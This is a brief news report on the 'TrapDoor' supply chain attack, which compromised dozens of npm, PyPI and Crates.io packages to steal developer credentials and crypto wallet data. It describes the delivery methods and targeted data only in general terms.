Supply Chain Attack Compromises Dozens of Open-Source Packages Across Major Ecosystems
A large-scale supply chain attack has been launched against npm, PyPI, and Crates.io, compromising at least 34 open-source packages and hundreds of associated versions.
The campaign, dubbed 'TrapDoor', is a crypto-focused credential stealer designed to infiltrate developer environments and exfiltrate sensitive data. Researchers have identified over 384 malicious versions distributed across the three ecosystems.
The hackers use ecosystem-specific techniques to execute malicious code during normal development workflows:
- npm packages trigger payload execution via post-install scripts
- PyPI packages execute remote JavaScript during import
- Crates.io packages abuse Rust’s build.rs to run malicious code at compile time
The shared payload, 'trap-core.js', scans infected systems for sensitive data, validates stolen credentials, and establishes persistence mechanisms.
Data theft and persistence techniques employed by the malware include:
- SSH keys and developer credentials
- AWS access keys and GitHub tokens
- Crypto wallet data (Solana, Sui, Aptos)
- Browser-stored login data and session information
- Environment variables and API keys